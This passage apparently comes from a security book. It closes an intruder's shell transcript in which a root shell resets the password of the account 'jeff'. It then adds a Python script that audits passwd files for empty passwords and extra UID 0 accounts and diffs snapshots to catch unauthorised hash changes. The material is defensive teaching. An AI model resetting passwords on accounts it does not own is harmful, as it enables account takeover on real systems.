422 Retype new password:
423 # passwd jeff
424 Changing password for jeff on suntzu
425 New password:
426 Retype new password:
427 # ^D
428 $ ^D
429 valley% ^D
430 There are stopped jobs
431 valley% logout
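Several of the weaknesses this intruder leaned on are visible in the password files themselves: the guest account with no password (line 7 of the commentary), the empty password field on sync and the two extra UID 0 accounts in the /etc/passwd dump at lines 183 to 197, and the passwords he quietly set on dormant accounts at lines 394 to 426. The Python script below is an added example, not code from the book; it audits a passwd-format file (local /etc/passwd or ypcat passwd output) for those conditions and diffs two snapshots so that a password hash changed without a ticket stands out. The entries and hashes are constructed in the transcript's format.

```python
"""Audit a passwd-format file for the weaknesses the transcript shows, and diff
two snapshots to catch password changes nobody authorised.
Added example, not from the book; the sample entries are constructed."""
from typing import Dict, List, NamedTuple, Tuple


class PwEntry(NamedTuple):
    name: str
    passwd: str
    uid: str
    gid: str
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> List[PwEntry]:
    """Parse name:passwd:uid:gid:gecos:home:shell lines; malformed ones are skipped."""
    entries = []
    for line in text.splitlines():
        fields = line.rstrip("\n").split(":")
        if len(fields) == 7:
            entries.append(PwEntry(*fields))
    return entries


def audit_passwd(text: str) -> List[Tuple[str, str]]:
    """(account, problem) pairs for the conditions an intruder exploits."""
    issues = []
    for e in parse_passwd(text):
        if e.name[:1] in ("+", "-"):  # NIS compatibility marker, as in '+::0:0:::'
            issues.append((e.name, "NIS marker: must be last, and NIS must be up"))
            continue
        if e.passwd == "":
            issues.append((e.name, "empty password field: logs in with no password"))
        if e.uid == "0" and e.name != "root":
            issues.append((e.name, "second UID 0 account"))
    return issues


def diff_passwd(old: str, new: str) -> Dict[str, str]:
    """Accounts whose password hash, UID or existence changed between snapshots."""
    before = {e.name: e for e in parse_passwd(old)}
    after = {e.name: e for e in parse_passwd(new)}
    changes: Dict[str, str] = {}
    for name in sorted(before.keys() | after.keys()):
        if name not in before:
            changes[name] = "added"
        elif name not in after:
            changes[name] = "removed"
        elif before[name].passwd != after[name].passwd:
            changes[name] = "password hash changed"
        elif before[name].uid != after[name].uid:
            changes[name] = "uid changed"
    return changes


# Constructed snapshots: a copy taken before the break-in, and the live file
# after an intruder has set passwords on guest, ericc and lori.
BEFORE = """\
root:HASHroot00000:0:1:Operator:/:/bin/csh
sync::1:1::/:/bin/sync
guest::100:50:Guest account:/home/guest:/bin/csh
sysdiag:*:0:1:Old System Diag:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag
ericc:HASHericcOLD0:4094:10:Eric:/home/guest/eric:/bin/csh
lori:HASHloriOLD00:5734:50:Lori:/home/guest/lori:/bin/csh
+::0:0:::
"""
AFTER = (BEFORE.replace("guest::", "guest:HASHguestNEW0:")
         .replace("HASHericcOLD0", "HASHericcNEW0")
         .replace("HASHloriOLD00", "HASHloriNEW00"))

if __name__ == "__main__":
    for acct, problem in audit_passwd(BEFORE):
        print("audit:", acct, "-", problem)
    for acct, change in diff_passwd(BEFORE, AFTER).items():
        print("diff: ", acct, "-", change)
```

Keep the baseline snapshot off the host (the intruder above read /etc/passwd.old and /etc/passwd.OLD as freely as the live file), and treat any hash change on an account whose owner has not logged in recently, as the last output at lines 349 to 393 shows, as an incident rather than housekeeping.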


IT Security: Risking the Corporation
ISBN: 013101112X
Year: 2003
Pages: 73